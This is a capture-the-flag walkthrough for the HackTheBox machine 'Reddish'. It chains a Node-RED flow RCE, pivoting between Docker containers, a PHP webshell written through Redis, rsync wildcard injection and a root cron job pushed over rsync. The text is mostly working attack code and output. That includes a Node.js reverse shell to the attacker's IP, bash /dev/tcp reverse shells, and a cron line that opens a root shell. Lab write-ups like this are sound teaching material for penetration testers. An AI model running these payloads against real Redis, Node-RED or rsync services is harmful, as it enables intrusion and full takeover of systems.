Reddish

It turned out that I had guessed redis was on the box well before the release, but that did not make the box easy. Upgraded from “medium” to “hard” and, finally, to “insane” after the release, the box is absolutely great and tough, even more so if you do it the way it was intended: via Node-RED and without Metasploit.

So.. let’s start!

Nmap fast

nmap -T4 -n -oA nmap/fast -vvv --top-ports 10000 10.10.10.94

# Nmap 7.70 scan initiated Sat Jul 21 21:02:24 2018 as:

Nmap scan report for 10.10.10.94

Host is up, received echo-reply ttl 63 (0.14s latency).

Scanned at 2018-07-21 21:02:24 CEST for 189s

Not shown: 8305 closed ports

Reason: 8305 resets

PORT STATE SERVICE REASON

1880/tcp open vsat-control syn-ack ttl 62

# Nmap done at Sat Jul 21 21:05:33 2018 -- 1 IP address (1 host up) scanned in 188.87 seconds

Nmap targeted

nmap -n -oA nmap/targeted -p1880 -sC -sV 10.10.10.94

Starting Nmap 7.70 ( https://nmap.org ) at 2018-08-07 18:42 CEST

Nmap scan report for 10.10.10.94

Host is up (0.026s latency).

PORT STATE SERVICE VERSION

1880/tcp open http Node.js Express framework

|_http-title: Error

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 12.78 seconds

Searching for the first brushstroke of red

Since we have found an HTTP server, let’s browse to it, with Burp as our proxy, as usual. Browsing to http://10.10.10.94:1880 we get an unfriendly:

Cannot GET /

But… if we cannot GET, maybe we can POST? Yes, we can (it seems so easy now, but it wasn’t at the time). Anyway, Nikto confirms:

nikto -h http://10.10.10.94:1880 | tee nikto.txt

- Nikto v2.1.6

---------------------------------------------------------------------------

+ Target IP: 10.10.10.94

+ Target Hostname: 10.10.10.94

+ Target Port: 1880

+ Start Time: 2018-08-07 18:47:46 (GMT2)

---------------------------------------------------------------------------

+ Server: No banner retrieved

+ Retrieved x-powered-by header: Express

+ The anti-clickjacking X-Frame-Options header is not present.

+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS

+ No CGI Directories found (use '-C all' to force check all possible dirs)

+ Server leaks inodes via ETags, header found with file /favicon.ico, fields: 0xW/423e 0x1632cb8ed78

+ Allowed HTTP Methods: POST

+ 7500 requests: 0 error(s) and 5 item(s) reported on remote host

+ End Time: 2018-08-07 18:54:31 (GMT2) (405 seconds)

---------------------------------------------------------------------------

So, in Burp, let’s change the GET to a POST:

POST / HTTP/1.1

Host: 10.10.10.94:1880

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Connection: close

Upgrade-Insecure-Requests: 1

Content-Type: application/x-www-form-urlencoded

Content-Length: 0

HTTP/1.1 200 OK

X-Powered-By: Express

Content-Type: application/json; charset=utf-8

Content-Length: 87

ETag: W/"57-5gVmW+IUL7M6oekncPl6scjimow"

Date: Tue, 07 Aug 2018 16:58:45 GMT

Connection: close

{"id":"$id","ip":"::ffff:10.10.14.150","path":"/red/{id}"}

or, if you prefer, curl:

curl -i -s -k -X $'POST' -H $'Host: 10.10.10.94:1880' -H $'Content-Type: application/x-www-form-urlencoded' $'http://10.10.10.94:1880/'

HTTP/1.1 200 OK

X-Powered-By: Express

Content-Type: application/json; charset=utf-8

Content-Length: 87

ETag: W/"57-kFaXR1RSZeIzvObprSVHIPm9xEQ"

Date: Mon, 27 Aug 2018 19:10:05 GMT

Connection: keep-alive

{"id":"b465ceb12a646cf737b24064e9b77135","ip":"::ffff:10.10.15.217","path":"/red/{id}"}

A path, an id… seems we have to combine them:

# on a bash (we will need it later)

id=b465ceb12a646cf737b24064e9b77135

# on a browser



http://10.10.10.94:1880/red/b465ceb12a646cf737b24064e9b77135
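
If you'd rather not copy the id by hand, a minimal sketch like the one below pulls it out of the JSON body and builds the editor URL. The function name `extract_id` is my own, and the sed pattern assumes the id is always a lowercase hex string as in the response above.

```shell
#!/usr/bin/env bash
# Sketch: extract the "id" field from the POST response and build the /red/ URL.
# extract_id is a hypothetical helper name; it assumes a lowercase hex id.
extract_id() {
  # Reads a JSON body on stdin and prints the value of "id"
  sed -n 's/.*"id":"\([0-9a-f]*\)".*/\1/p'
}

# Sample body copied from the curl response shown above
resp='{"id":"b465ceb12a646cf737b24064e9b77135","ip":"::ffff:10.10.15.217","path":"/red/{id}"}'

id=$(printf '%s\n' "$resp" | extract_id)
echo "http://10.10.10.94:1880/red/$id"
```

Against the live box, the sample body would be replaced by the output of the `curl -s -X POST` call.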


Talking about penetration testing, shall we try a glimpse of red?

Node-RED is a flow-based programming tool for the Internet of Things (https://nodered.org/). Since it is a programming tool, can we build something suitable for pentesting, for instance an RCE? Yes!



Let’s start with a simple click-and-go RCE. There are basic tutorials on YouTube, so after some practice we should be able to import this flow:

[{"id":"cedad8b.cde5ea8","type":"tab","label":"Flow 1"},{"id":"5be0b43c.daa0d4","type":"inject","z":"cedad8b.cde5ea8","name":"","topic":"","payload":"hostname; whoami; id;","payloadType":"str","repeat":"","crontab":"","once":false,"onceDelay":0.1,"x":160,"y":100,"wires":[["edd65e0c.12f8e8"]]},{"id":"13c480e6.33020f","type":"debug","z":"cedad8b.cde5ea8","name":"","active":true,"tosidebar":true,"console":false,"tostatus":false,"complete":"payload","x":374.5,"y":360,"wires":[]},{"id":"edd65e0c.12f8e8","type":"exec","z":"cedad8b.cde5ea8","command":"bash -c","addpay":true,"append":"","useSpawn":"false","timer":"","oldrc":false,"name":"","x":264.5,"y":220,"wires":[["13c480e6.33020f"],["13c480e6.33020f"],[]]}]

and fire it by clicking the “button” on the left of the first block. We should see the result in the debug tab (on the right):

For instance we can get the name of the server: nodered

Node reverse shell on Node-RED 10.10.10.94

Changing the RCE flow at each command is a pain in the neck, so why not implement a lovely node reverse shell on nodered? Of course it can be done from the above RCE, but… what about something more reddish?

[{"id":"903ee279.8fbea","type":"http in","z":"837e07cc.ac1378","name":"","url":"exec","method":"post","upload":false,"swaggerDoc":"","x":369.5,"y":117,"wires":[["6b719869.c029d8"]]},{"id":"6b719869.c029d8","type":"exec","z":"837e07cc.ac1378","command":"","addpay":true,"append":"","useSpawn":"false","timer":"5","oldrc":true,"name":"","x":870,"y":120,"wires":[["9daf85f7.64e938"],["9daf85f7.64e938"],["9daf85f7.64e938"]]},{"id":"9daf85f7.64e938","type":"http response","z":"837e07cc.ac1378","name":"","statusCode":"200","headers":{},"x":1220,"y":120,"wires":[]}]

Got the point? Not yet? Let’s issue some other commands:

# on a bash

nc -lnvp 443

# on another bash

id=b465ceb12a646cf737b24064e9b77135

IP=10.10.15.217

curl -X POST -H "Content-Type: text/plain" --data-binary "node -p '(function(){var net = require(\"net\"),cp = require(\"child_process\"),sh = cp.spawn(\"/bin/bash\", [\"-i\"]);var client = new net.Socket();client.connect(443, \"$IP\", function(){client.pipe(sh.stdin);sh.stdout.pipe(client);sh.stderr.pipe(client);});return /a/;})();'" http://10.10.10.94:1880/api/$id/exec

Got it? We have created a listener on Node-RED that takes our payload (in this case a Node.js reverse shell) and executes it.
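
Since the exec node runs whatever arrives as the POST body, the same endpoint also works as a poor man's command runner. Here is a small sketch of a wrapper. `TARGET`, `reddish_endpoint` and `reddish_exec` are names I made up, and it assumes the flow above is deployed under /api/$id/exec.

```shell
#!/usr/bin/env bash
# Sketch: wrap the /exec flow in a helper. All names here are hypothetical.
TARGET="${TARGET:-http://10.10.10.94:1880}"

reddish_endpoint() {
  # usage: reddish_endpoint <session id> <flow url>
  printf '%s/api/%s/%s\n' "$TARGET" "$1" "$2"
}

reddish_exec() {
  # usage: reddish_exec <session id> <command...>
  # The whole command line is sent as the body; the exec node appends it
  # to its (empty) command and returns stdout/stderr in the response.
  local sid="$1"
  shift
  curl -s -X POST -H 'Content-Type: text/plain' \
    --data-binary "$*" "$(reddish_endpoint "$sid" exec)"
}
```

Something like `reddish_exec "$id" 'hostname; whoami; id'` should then print the same output we saw in the debug tab, without touching the editor.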

Exploring “nodered”

Once we are on “nodered” we realize that we are in a Docker container. After a while we understand that there are no flags for us here and that no Docker escape is possible (at least not the more common ones).

If nothing can be done in the box, let’s think out of the box:

cat /etc/hosts

127.0.0.1 localhost

::1 localhost ip6-localhost ip6-loopback

fe00::0 ip6-localnet

ff00::0 ip6-mcastprefix

ff02::1 ip6-allnodes

ff02::2 ip6-allrouters

172.18.0.2 nodered

172.19.0.4 nodered

ip addr

1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1

link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00

inet 127.0.0.1/8 scope host lo

valid_lft forever preferred_lft forever

11: eth1@if12: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default

link/ether 02:42:ac:13:00:03 brd ff:ff:ff:ff:ff:ff

inet 172.19.0.3/16 brd 172.19.255.255 scope global eth1

valid_lft forever preferred_lft forever

13: eth0@if14: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default

link/ether 02:42:ac:12:00:02 brd ff:ff:ff:ff:ff:ff

inet 172.18.0.2/16 brd 172.18.255.255 scope global eth0

valid_lft forever preferred_lft forever

ip neigh

172.18.0.1 dev eth0 lladdr 02:42:8d:ae:54:8e REACHABLE

172.19.0.1 dev eth1 lladdr 02:42:8b:ca:db:46 STALE

172.19.0.2 dev eth1 lladdr 02:42:ac:13:00:02 STALE

172.19.0.4 dev eth1 lladdr 02:42:ac:13:00:04 REACHABLE

Both networks are /16, but all the addresses seen so far are low ones, so we limit our ping scan to the first 254 hosts of each subnet:

for i in {1..254};do (ping 172.18.0.$i -c 1 -w 5 >/dev/null && echo "172.18.0.$i" &);done

172.18.0.1

172.18.0.2

for i in {1..254};do (ping 172.19.0.$i -c 1 -w 5 >/dev/null && echo "172.19.0.$i" &);done

172.19.0.1

172.19.0.2

172.19.0.3

172.19.0.4

nscan () {

[[ $# -ne 1 ]] && echo "No IP address provided" && return 1

for i in {1..10000} ; do

SERVER="$1"

PORT=$i

(echo > /dev/tcp/$SERVER/$PORT) >& /dev/null &&

echo "Port $PORT seems to be open"

done

}

nscan 172.19.0.3

Port 80 seems to be open

nscan 172.19.0.2

Port 6379 seems to be open

nscan 172.18.0.1

Port 1880 seems to be open

nscan 172.19.0.4

Port 1880 seems to be open
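
One weakness of nscan is that a filtered port can make /dev/tcp hang for a long time. A possible variant, sketched below, wraps each probe in `timeout`. It assumes coreutils `timeout` is available in the container (I did not verify that on the box), and the names `probe_port` and `nscan_fast` are mine.

```shell
#!/usr/bin/env bash
# Sketch: /dev/tcp probe with a per-port timeout (assumes coreutils `timeout`).
probe_port() {
  # usage: probe_port <host> <port> [timeout seconds]
  # Returns 0 if the TCP connection succeeds within the timeout.
  local host="$1" port="$2" secs="${3:-1}"
  timeout "$secs" bash -c 'exec 3<>"/dev/tcp/$0/$1"' "$host" "$port" 2>/dev/null
}

nscan_fast() {
  # usage: nscan_fast <host> <port> [<port> ...]
  local host="$1" port
  for port in "${@:2}"; do
    probe_port "$host" "$port" && echo "Port $port seems to be open"
  done
  return 0
}
```

For example `nscan_fast 172.19.0.2 80 873 1880 6379` checks just the handful of ports we care about instead of walking all 10000.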

Some educated guesses:

- a www server on 172.19.0.3:80

- a redis server 172.19.0.2:6379 (google “tcp port 6379” >> https://redis.io/topics/protocol)

- our host is 172.19.0.4, because port 1880 seems to be open there

Please note that IPs change over time.



Pivoting with Node-RED

This is, IMHO, the trickiest part of the machine, at least if you don’t know how to use Node-RED. Let’s start by saying that all the well-known tools (wget, curl, nc) for exploring the other containers are missing. We can upload them but, of course, we can also pivot via Node-RED. Even if the author of the box would deny it, this is a pain in the… neck. A funny, interesting pain, indeed, but still a pain. Long story short, we can set up a sort of Node-RED port-forwarding flow to explore the www server:

[{"id":"9daf85f7.64e938","type":"http response","z":"837e07cc.ac1378","name":"","statusCode":"200","headers":{},"x":1240,"y":260,"wires":[]},{"id":"67adf3fb.3e43d4","type":"http in","z":"837e07cc.ac1378","name":"","url":"www","method":"post","upload":false,"swaggerDoc":"","x":360,"y":260,"wires":[["c2f39c61.e9a1e8"]]},{"id":"c2f39c61.e9a1e8","type":"tcp request","z":"837e07cc.ac1378","server":"172.19.0.3","port":"80","out":"time","splitc":"0","name":"","x":890,"y":260,"wires":[["9daf85f7.64e938"]]}]

Exploring www server (172.19.0.3), via Node-RED

Once port forwarding is established we can literally “debug” our way to the server, with Burp and a lot of tries. The magic to get the root page of the internal www server is this relayed request, where a raw HTTP request travels as the POST body:

curl -i -s -k -X $'POST' \

-H $'Content-Type: text/plain' -H $'Content-Length: 9' \

--data-binary $'GET /\x0d\x0a\x0d\x0a' \

$"http://10.10.10.94:1880/api/$id/www"
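
The Content-Length header has to match the raw payload exactly, CR and LF included, and counting by hand gets old quickly. A tiny helper along these lines does the counting. `raw_len` is a hypothetical name, and it relies on bash's `printf '%b'` expanding `\xHH` escapes the same way `$'...'` does.

```shell
#!/usr/bin/env bash
# Sketch: count the bytes of a payload written with \xHH escapes.
raw_len() {
  # %b makes printf interpret backslash escapes inside the argument
  printf '%b' "$1" | wc -c | tr -d ' '
}

raw_len 'GET /\x0d\x0a\x0d\x0a'
```

Note the single quotes: the escapes are passed literally and expanded by printf. Dropping the explicit Content-Length header and letting curl compute it is probably the simpler option, but I left the requests as I actually sent them.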

On the server, among other things, we can find a comment:

* TODO

*

* 1. Share the web folder with the database container (Done)

* 2. Add here the code to backup databases in /f187a0ec71ce99642e4f0afbd441a68b folder

* ...Still don't know how to complete it...

For sure we don’t know how to complete it either, at the moment. Anyway… we can confirm that the /f187a0ec71ce99642e4f0afbd441a68b folder exists with another relayed request:

curl -i -s -k -X $'POST' \

-H $'Content-Type: text/plain' -H $'Content-Length: 42' \

--data-binary $'GET /f187a0ec71ce99642e4f0afbd441a68b/\x0d\x0a\x0d\x0a' \

$"http://10.10.10.94:1880/api/$id/www"

HTTP/1.1 200 OK

X-Powered-By: Express

Content-Length: 318

Content-Type: application/octet-stream

ETag: W/"13e-pF56yJV6DMAo+m4NuPbVuPOg0gE"

Date: Mon, 06 Aug 2018 18:06:51 GMT

Connection: keep-alive

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>

<title>403 Forbidden</title>

</head><body>

<h1>Forbidden</h1>

<p>You don't have permission to access /f187a0ec71ce99642e4f0afbd441a68b/

on this server.<br />

</p>

<hr>

<address>Apache/2.4.10 (Debian) Server at 172.19.0.3 Port 80</address>

</body></html>

Exploring redis server (172.19.0.2), via Node-RED

Just for fun we can set up a Node-RED pivoting flow to the redis server too…

[{"id":"9daf85f7.64e938","type":"http response","z":"837e07cc.ac1378","name":"","statusCode":"200","headers":{},"x":1240,"y":420,"wires":[]},{"id":"56c49560.fa45f4","type":"http in","z":"837e07cc.ac1378","name":"","url":"redis","method":"post","upload":false,"swaggerDoc":"","x":370,"y":420,"wires":[["a2d59896.0a49f8"]]},{"id":"a2d59896.0a49f8","type":"tcp request","z":"837e07cc.ac1378","server":"172.19.0.2","port":"6379","out":"time","splitc":"0","name":"","x":900,"y":420,"wires":[["9daf85f7.64e938"]]}]

… and request an INFO response from it:

curl -i -s -k -X $'POST' \

-H $'Content-Type: text/plain' -H $'Content-Length: 10' \

--data-binary $'INFO\x0d\x0a\x0d\x0a\x0d\x0a' \

$"http://10.10.10.94:1880/api/$id/redis"

HTTP/1.1 200 OK

X-Powered-By: Express

Content-Length: 2748

Content-Type: application/octet-stream

ETag: W/"abc-Uh2eQdJ548e7Bi2C1C08RrXWXjw"

Date: Tue, 07 Aug 2018 22:09:59 GMT

Connection: keep-alive

$2739

# Server

redis_version:4.0.9

redis_git_sha1:00000000

redis_git_dirty:0

redis_build_id:cce7cc41d26597f7

redis_mode:standalone

os:Linux 4.4.0-130-generic x86_64

arch_bits:64

multiplexing_api:epoll

atomicvar_api:atomic-builtin

gcc_version:6.4.0

process_id:7

run_id:6c184850571016e793554cee3957ac9abc2e61cd

tcp_port:6379

uptime_in_seconds:11405

uptime_in_days:0

hz:10

lru_clock:6953143

executable:/data/redis-server

config_file:

[...]

Further details on the Redis INFO command can be found in the Redis documentation.

Exploiting all the things in the box

Google is our friend: http://reverse-tcp.xyz/pentest/database/2017/02/09/Redis-Hacking-Tips.html gives a handy minimal guide to deploy an RCE on the web server (remember the comment “Share the web folder with the database container (Done)”?)

# check $id

echo $id

# config set dir

curl -i -s -k -X $'POST' \

-H $'Content-Type: text/plain' -H $'Content-Length: 30' \

--data-binary $'config set dir /var/www/html\x0d\x0a' \

$"http://10.10.10.94:1880/api/$id/redis"

# config set dbfilename

curl -i -s -k -X $'POST' \

-H $'Content-Type: text/plain' -H $'Content-Length: 31' \

--data-binary $'config set dbfilename sys.php\x0d\x0a' \

$"http://10.10.10.94:1880/api/$id/redis"

# set test

curl -i -s -k -X $'POST' \

-H $'Content-Type: text/plain' -H $'Content-Length: 47' \

--data-binary $'set test \"<?php system($_REQUEST[\'cmd\']); ?>\"\x0d\x0a' \

$"http://10.10.10.94:1880/api/$id/redis"

# save

curl -i -s -k -X $'POST' \

-H $'Content-Type: text/plain' -H $'Content-Length: 6' \

--data-binary $'save\x0d\x0a' \

$"http://10.10.10.94:1880/api/$id/redis"

# locally

curl -i -s -k -X $'POST' \

-H $'Content-Type: text/plain' -H $'Content-Length: 29' \

--data-binary $'GET /sys.php?cmd=hostname\x0d\x0a\x0d\x0a' \

$"http://10.10.10.94:1880/api/$id/www"

[...]

www

[...]

It works! We have uploaded an RCE PHP script to the www server via redis!
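
The requests above use Redis inline commands, which is why the PHP payload needs careful quoting. Redis also accepts the length-prefixed RESP array form, where quoting is not an issue. Below is a sketch of an encoder. `resp_encode` is my own name, and I have not tried this variant through the Node-RED flow on the box, so treat it as an assumption that it behaves the same.

```shell
#!/usr/bin/env bash
# Sketch: encode a command as a RESP array of bulk strings.
resp_encode() {
  # usage: resp_encode <command> [<arg> ...]
  # LC_ALL=C makes ${#arg} count bytes rather than characters
  local LC_ALL=C arg
  printf '*%d\r\n' "$#"
  for arg in "$@"; do
    printf '$%d\r\n%s\r\n' "${#arg}" "$arg"
  done
}
```

The output could be piped into curl with `--data-binary @-`, for instance `resp_encode config set dbfilename sys.php | curl -s -X POST -H 'Content-Type: text/plain' --data-binary @- "http://10.10.10.94:1880/api/$id/redis"`.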

Let’s bash in a rush for a ready redis mush

To further explore redis we can set up a convenient bash function (without a hard-coded Content-Length, so that it works for commands of any length):

reddish_redis () { curl -i -s -k -X $'POST' -H $'Content-Type: text/plain' --data-binary "$*"$'\x0d\x0a\x0d\x0a\x0d\x0a' $"http://10.10.10.94:1880/api/$id/redis"; }

reddish_redis INFO

[...]

It works, but nothing really interesting there…

Pivoting to www server (172.19.0.3)

Ok, stop playing with Node-RED! It’s time to pivot to the www server (172.19.0.3). Let’s upload nc to nodered.

Wait wait wait… is it really needed? Mhhh probably not, but… let’s do it because it’s easier with it than without it:

# locally

cp /bin/nc .

md5sum nc

base64 nc | xclip

# on nodered

echo 'paste_here_our_clipboard' > b64

cat b64 | base64 --decode > /tmp/nc

md5sum /tmp/nc

chmod +x /tmp/nc

/tmp/nc -lnvp 1234

# locally

curl -i -s -k -X $'POST' \

-H $'Content-Type: text/plain' -H $'Content-Length: 175' \

--data-binary $'GET /sys.php?cmd=%2f%62%69%6e%2f%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%6e%6f%64%65%72%65%64%2f%31%32%33%34%20%30%3e%26%31%27\x0d\x0a' \

$"http://10.10.10.94:1880/api/$id/www"

The last step is, again, a tricky one. Let’s explain it: we are firing the reverse shell from www (172.19.0.3) to nodered, using its hostname:

/bin/bash -c 'bash -i >& /dev/tcp/nodered/1234 0>&1'

# urlencoded as

%2f%62%69%6e%2f%62%61%73%68%20%2d%63%20%27%62%61%73%68%20%2d%69%20%3e%26%20%2f%64%65%76%2f%74%63%70%2f%6e%6f%64%65%72%65%64%2f%31%32%33%34%20%30%3e%26%31%27
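
For the record, the encoding is nothing fancy: every byte simply becomes %HH. A minimal bash sketch that should reproduce it is below (`urlencode_all` is a made-up name, and it is only meant for ASCII input).

```shell
#!/usr/bin/env bash
# Sketch: percent-encode every byte of a string (ASCII input assumed).
urlencode_all() {
  local LC_ALL=C s="$1" out="" hex i
  for ((i = 0; i < ${#s}; i++)); do
    # A leading single quote makes printf use the character's numeric value
    printf -v hex '%%%02x' "'${s:i:1}"
    out+="$hex"
  done
  printf '%s\n' "$out"
}

urlencode_all "/bin/bash -c 'bash -i >& /dev/tcp/nodered/1234 0>&1'"
```

Encoding everything is overkill, since only the spaces and shell metacharacters really need it, but it saves us from thinking about which characters are safe.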

Exploring www server (172.19.0.3) from a shell

Since we are on a new server (another docker indeed), we have to do some basic exploration:

cat /etc/hostname

[...]

cat /etc/hosts

[...]

cat /backup/backup.sh

cd /var/www/html/f187a0ec71ce99642e4f0afbd441a68b

rsync -a *.rdb rsync://backup:873/src/rdb/

cd / && rm -rf /var/www/html/*

rsync -a rsync://backup:873/src/backup/ /var/www/html/

chown www-data. /var/www/html/f187a0ec71ce99642e4f0afbd441a68b

Talking about rsync, we should get some basic information on what’s going on…

man rsync

[...]

Local: rsync [OPTION...] SRC... [DEST]

Access via remote shell:

Pull: rsync [OPTION...] [USER@]HOST:SRC... [DEST]

Push: rsync [OPTION...] SRC... [USER@]HOST:DEST

Access via rsync daemon:

Pull: rsync [OPTION...] [USER@]HOST::SRC... [DEST]

rsync [OPTION...] rsync://[USER@]HOST[:PORT]/SRC... [DEST]

Push: rsync [OPTION...] SRC... [USER@]HOST::DEST

rsync [OPTION...] SRC... rsync://[USER@]HOST[:PORT]/DEST

[...]

…so we can infer that rsync is running in daemon mode on the backup server.

Exploiting rsync to get the user flag

Ok, we kinda got what rsync is used for but, in order to exploit it, we need more info. Google helps us:

- https://www.defensecode.com/public/DefenseCode_Unix_WildCards_Gone_Wild.txt

- https://download.samba.org/pub/rsync/rsync.html

- https://unix.stackexchange.com/questions/369340/is-it-possible-to-show-how-bash-globbing-works-by-doing

So, we have a globbing opportunity to try:

cd /var/www/html/f187a0ec71ce99642e4f0afbd441a68b

echo '#!/bin/bash

cp /bin/bash /tmp/test

chmod 4777 /tmp/test' > test.rdb

touch -- '-e sh test.rdb'

Now we have to wait for the cron job to execute backup.sh (3 minutes?) and we can finally get our user flag.

/tmp/test -p

cat /home/somaro/user.txt

c09aca7cb02c968b1e9637d5********

What did we actually do? We exploited the second line of the script, rsync -a *.rdb rsync://backup:873/src/rdb/. The shell expands *.rdb to include our file named -e sh test.rdb, and rsync parses that name as its -e (remote shell) option, so it runs sh test.rdb. In this way the cron job copies bash to a temp file and gives it the SUID bit.
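
To see the expansion with your own eyes, without touching rsync at all, here is a harmless local sketch. It recreates the two file names in a scratch directory and prints, one per line, the arguments the shell would hand over. `demo_glob` is a hypothetical name, and the `./*.rdb` form in the second line is the usual defensive fix, not something taken from the box.

```shell
#!/usr/bin/env bash
# Sketch: show how *.rdb turns a crafted file name into an rsync option.
demo_glob() {
  local dir
  dir=$(mktemp -d) || return 1
  (
    cd "$dir" || exit 1
    : > test.rdb
    : > '-e sh test.rdb'
    echo "vulnerable:"
    # Each bracketed line is one argument as rsync would receive it
    printf '[%s]\n' rsync -a *.rdb rsync://backup:873/src/rdb/
    echo "safer:"
    # With a ./ prefix no expanded name can start with a dash
    printf '[%s]\n' rsync -a ./*.rdb rsync://backup:873/src/rdb/
  )
  rm -rf "$dir"
}

demo_glob
```

In the vulnerable listing the crafted name shows up as a single argument starting with a dash, which is exactly what an option parser looks for.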

Pivoting to the root flag

Looking inside the container for further exploitation, we found almost nothing. Instead, we can find something outside of it:

ping -c 1 backup

PING backup (172.20.0.2) 56(84) bytes of data.

nscan 172.20.0.2

Port 873 seems to be open

Since 873 is the only open port on “backup”, remote exploitation of rsync seems to be the only option to try. First of all we do a little enumeration, listing files on “backup”:

rsync --list-only rsync://root@backup:873/

rsync --list-only rsync://root@backup:873/src/etc/cron.d/

Since we can see root’s cron jobs, the rsync daemon is presumably running as root on the remote side, so we may try to upload a cron job with a reverse shell:

echo '* * * * * root /bin/bash -c "bash -i >& /dev/tcp/www/7411 0>&1"' > /tmp/cronzero

rsync -a /tmp/cronzero rsync://root@backup:873/src/etc/cron.d/

rm /tmp/cronzero

Waiting up to a minute on www, with nc listening on 7411, should result in a reverse shell.

# locally

base64 nc | xclip

# on www

cd /tmp

echo 'paste_here_our_clipboard' > b64

cat b64 | base64 --decode > /tmp/nc

md5sum /tmp/nc

chmod +x /tmp/nc

/tmp/nc -lnvp 7411

# on www

nc -lnvp 7411
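
The clipboard transfer of nc is easy to get wrong (a truncated paste, a stray character), which is why I compare md5sums on both sides. The same idea can be rehearsed locally with a sketch like this one. `b64_roundtrip` is a made-up helper and it uses `cmp` instead of md5sum just to keep it short.

```shell
#!/usr/bin/env bash
# Sketch: check that a file survives a base64 encode/decode round trip.
b64_roundtrip() {
  # usage: b64_roundtrip <file>
  # Returns 0 if the decoded copy is byte-identical to the original.
  local src="$1" tmp rc
  tmp=$(mktemp) || return 1
  base64 < "$src" | base64 --decode > "$tmp"
  cmp -s "$src" "$tmp"
  rc=$?
  rm -f "$tmp"
  return "$rc"
}
```

Running `b64_roundtrip /bin/nc && echo ok` before pasting anything tells us that the encoding side, at least, is fine.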

The root flag

When I finally got here the box was still rated “medium”. Yuntao, you were joking, weren’t you?

Anyway, let’s get the flag:

cd /mnt

mkdir 1

mount /dev/sda1 1

cd 1

cd root

cat root.txt

50d0db644c8d5ff5312ef3d1********

cd /

Uh? What the ■■■■? Ok, ok… long story short, if you are in an unprivileged Docker container you can’t see all the devices. But if you are in a privileged one, you can:

cd /dev

cd /dev

root@backup:/dev# ls -la

ls -la

total 4

drwxr-xr-x 14 root root 3720 Sep 29 19:42 .

drwxr-xr-x 1 root root 4096 Jul 15 17:42 ..

[...]

brw-rw---- 1 root disk 8, 0 Sep 29 19:42 sda

brw-rw---- 1 root disk 8, 1 Sep 29 19:42 sda1

brw-rw---- 1 root disk 8, 2 Sep 29 19:42 sda2

brw-rw---- 1 root disk 8, 3 Sep 29 19:42 sda3

brw-rw---- 1 root disk 8, 4 Sep 29 19:42 sda4

brw-rw---- 1 root disk 8, 5 Sep 29 19:42 sda5

[...]

And you can also mount them…

Bonuses

- get hostname from (a) redis (https://redis.io/topics/rediscli):

  - $ redis-cli -x set foo < /etc/hostname

  - $ redis-cli getrange foo 0 50

- netstat is limited? use ss

- As you have seen, the previous flows were all IP-based. After getting into any container we can get the hostnames of all of them and write down this multi-endpoint flow on Node-RED:

[{"id":"571d3e75.251a1","type":"tab","label":"Flow 1"},{"id":"6de461c2.442b9","type":"http in","z":"571d3e75.251a1","name":"","url":"exec","method":"post","upload":false,"swaggerDoc":"","x":369.5,"y":117,"wires":[["9b8d25b3.e88168"]]},{"id":"9b8d25b3.e88168","type":"exec","z":"571d3e75.251a1","command":"","addpay":true,"append":"","useSpawn":"false","timer":"5","oldrc":true,"name":"","x":870,"y":120,"wires":[["ef69d762.9b80c8"],["ef69d762.9b80c8"],["ef69d762.9b80c8"]]},{"id":"ef69d762.9b80c8","type":"http response","z":"571d3e75.251a1","name":"","statusCode":"200","headers":{},"x":1240,"y":260,"wires":[]},{"id":"8f313a05.b4584","type":"http in","z":"571d3e75.251a1","name":"","url":"www","method":"post","upload":false,"swaggerDoc":"","x":360,"y":260,"wires":[["d0fb984c.41c2a"]]},{"id":"d0fb984c.41c2a","type":"tcp request","z":"571d3e75.251a1","server":"www","port":"80","out":"time","splitc":"0","name":"","x":870,"y":260,"wires":[["ef69d762.9b80c8"]]},{"id":"ef0de5cc.18f69","type":"http in","z":"571d3e75.251a1","name":"","url":"redis","method":"post","upload":false,"swaggerDoc":"","x":370,"y":420,"wires":[["54051ad0.6db8ec"]]},{"id":"54051ad0.6db8ec","type":"tcp request","z":"571d3e75.251a1","server":"redis","port":"6379","out":"time","splitc":"0","name":"","x":880,"y":420,"wires":[["ef69d762.9b80c8"]]}]

This is useful, for instance, if someone resets the box while you are working on the third docker figuring out how to get that ■■■■ flag out of the box…